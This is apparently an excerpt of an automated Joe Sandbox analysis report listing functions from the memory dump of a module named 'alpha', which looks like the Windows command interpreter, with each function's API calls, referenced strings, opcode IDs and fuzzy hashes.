                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _get_osfhandle$ConsoleMode
                                                                                                  • String ID:
                                                                                                  • API String ID: 1591002910-0
                                                                                                  • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                  • Instruction ID: 815b9e161b42dcbc00516e1450e09704d648b3bfa50ebe8309110365b97ac533
                                                                                                  • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                  • Instruction Fuzzy Hash: BEF06235A19702CBE644AB11E945078BEA0FB8A712BB44134C90E87324DEBCA889CB30
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DriveType
                                                                                                  • String ID: :
                                                                                                  • API String ID: 338552980-336475711
                                                                                                  • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                  • Instruction ID: 1552b9c495b1198f31b028748a6ad8fad45433ecd7d8cfc6121c96ffa56d126e
                                                                                                  • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                  • Instruction Fuzzy Hash: 39E06567618640C6D7209B50E45106AF760FB8D749FD41525D98D83B24DB3CD199CF18
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF7823DCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDA6
                                                                                                    • Part of subcall function 00007FF7823DCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDBD
                                                                                                  • GetConsoleTitleW.KERNELBASE ref: 00007FF7823E5B52
                                                                                                    • Part of subcall function 00007FF7823E4224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E4297
                                                                                                    • Part of subcall function 00007FF7823E4224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E42D7
                                                                                                    • Part of subcall function 00007FF7823E4224: memset.MSVCRT ref: 00007FF7823E42FD
                                                                                                    • Part of subcall function 00007FF7823E4224: memset.MSVCRT ref: 00007FF7823E4368
                                                                                                    • Part of subcall function 00007FF7823E4224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E4380
                                                                                                    • Part of subcall function 00007FF7823E4224: wcsrchr.MSVCRT ref: 00007FF7823E43E6
                                                                                                    • Part of subcall function 00007FF7823E4224: lstrcmpW.KERNELBASE ref: 00007FF7823E4401
                                                                                                  • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7823E5BC7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                                  • String ID:
                                                                                                  • API String ID: 497088868-0
                                                                                                  • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                  • Instruction ID: f65f30f7ad848f1a1487826c341d407ed2b9ceb31849316831eeba10f3cbadfa
                                                                                                  • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                  • Instruction Fuzzy Hash: 7931D564B1C68252FA20B711E4741BDE290FF89B82FE44479E94E87F95DEBCE405C720
                                                                                                  APIs
                                                                                                  • FindClose.KERNELBASE(?,?,?,00007FF7823FEAC5,?,?,?,00007FF7823FE925,?,?,?,?,00007FF7823DB9B1), ref: 00007FF7823E3A56
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseFind
                                                                                                  • String ID:
                                                                                                  • API String ID: 1863332320-0
                                                                                                  • Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                                  • Instruction ID: 84dc9204f0bdf6795759e90a07af6f2815cadad470fd3fd0ffa5bed5d67eedbc
                                                                                                  • Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                                  • Instruction Fuzzy Hash: 9E01D624F08643A5E754A715E460079F7A0FF88B52BF09474D50D83E54DEACF8D5C320
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::cancel_current_taskmalloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1412018758-0
                                                                                                  • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                  • Instruction ID: 0acaeeffe5221622a478c68359f63696255b99e89004fe0622172e96b5870b2e
                                                                                                  • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                  • Instruction Fuzzy Hash: 3AE06D04F09207A1FE253BA2A86107892447F18742EA814B8DD0D0AF82EEACE499C330
                                                                                                  APIs
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDA6
                                                                                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDBD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$AllocProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 1617791916-0
                                                                                                  • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                  • Instruction ID: 0b83759cb8bbf4c04520715e515cc31c47f5580e82245f16b140522067c25896
                                                                                                  • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                  • Instruction Fuzzy Hash: 69F03175E1864286EB44AB15F8500B8FBA0FB89B42BB89539D90E03754DF7CE885C720
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: exit
                                                                                                  • String ID:
                                                                                                  • API String ID: 2483651598-0
                                                                                                  • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                  • Instruction ID: b49e022e1f6f7388d69f0c1ec66d1aa41d257a134d75b7a2d1f0f7fc7a0c9762
                                                                                                  • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                  • Instruction Fuzzy Hash: D3C01234704646A7EB1C7732646103999647B0C202F54547CC60A82A82DDACD808C234
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DefaultUser
                                                                                                  • String ID:
                                                                                                  • API String ID: 3358694519-0
                                                                                                  • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                  • Instruction ID: 3ce96235199bc744a1a4da9a2b2729aa7b8dc423fca2729c20f2a6aa6e19f1ff
                                                                                                  • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                  • Instruction Fuzzy Hash: 9DE0C2EAD08253ABF5943B42E0513B49993EB78783FE440B5C60F02EC4C96D2885D228
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 2221118986-0
                                                                                                  • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                  • Instruction ID: 5663b1c2a1c58b2f3add60708e504bb74ed94fddf846b321b2629b8c67e1f688
                                                                                                  • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                  • Instruction Fuzzy Hash: 40F0B425B0979140EA40A757F9501299290AB88BE0B988375EA7C57FC5DE7CD451C700
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                                  • String ID: $Application$System
                                                                                                  • API String ID: 3538039442-1881496484
                                                                                                  • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                  • Instruction ID: 32098c014e345cc6cc3d9bbb17c95a8a9f933a78b55aa1ecc746a82d7de45fe2
                                                                                                  • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                  • Instruction Fuzzy Hash: C251D332B08B4193EB619B15F41467AFAA1FB89B46F948138DE4E03B54DF7CE845CB20
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                                  • String ID: COPYCMD$\
                                                                                                  • API String ID: 3989487059-1802776761
                                                                                                  • Opcode ID: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                                                                                  • Instruction ID: 0be6c8a049f1a91011ad49935cf0f2b3526e5bd633ce7819a7ba7eddc132b3a9
                                                                                                  • Opcode Fuzzy Hash: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                                                                                  • Instruction Fuzzy Hash: 27F1D665B0874681FF50BB15E4242BAE7A0FF45B89FA44079CE4E47B94DEBCE845C710
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                                  • String ID: @P
                                                                                                  • API String ID: 1801357106-3670739982
                                                                                                  • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                  • Instruction ID: 1c6b5600da51185aa26a912f01a0e7fcf59bfadc6024babe589057a24df95dcd
                                                                                                  • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                  • Instruction Fuzzy Hash: 9E417D32B04A41DBE710AF65E4503EDBBA0FB89749F948275DA0D43A98DFB8D948C760
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsnicmpwcsrchr
                                                                                                  • String ID: COPYCMD
                                                                                                  • API String ID: 2429825313-3727491224
                                                                                                  • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                                  • Instruction ID: b4e5a07742cb1dbaa6c7fe22f2cf61b388d2a572d9396e0ce1e72b2aee086b19
                                                                                                  • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                                  • Instruction Fuzzy Hash: EEF1C432F0860286FB61AF55A0641BDB6F1BB0479AFA04179DE5D23ED8DFBCA444C760
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$AllocProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 1617791916-0
                                                                                                  • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                  • Instruction ID: 1ce39be5f352f93f2856085d01a7f4bde01f541d0a5b31d07bdb68cb88a58b70
                                                                                                  • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                  • Instruction Fuzzy Hash: 65A1E525B1865291EB50BB25E4646B9F6A1FF88B82FE04179DD4E43F90DFBCE405C720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmp$EnvironmentVariable
                                                                                                  • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                                  • API String ID: 198002717-267741548
                                                                                                  • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                  • Instruction ID: 81dce35f078de9de8548cd1d8424c466a29977f0982f50db8c9ed547376c9713
                                                                                                  • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                  • Instruction Fuzzy Hash: ED512F25A0864395E6507F12E820179EBA0FF59B82FE49079D90E53A65DFBCE448C770
                                                                                                  APIs
                                                                                                  • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7823DE626,?,?,00000000,00007FF7823E1F69), ref: 00007FF7823DF000
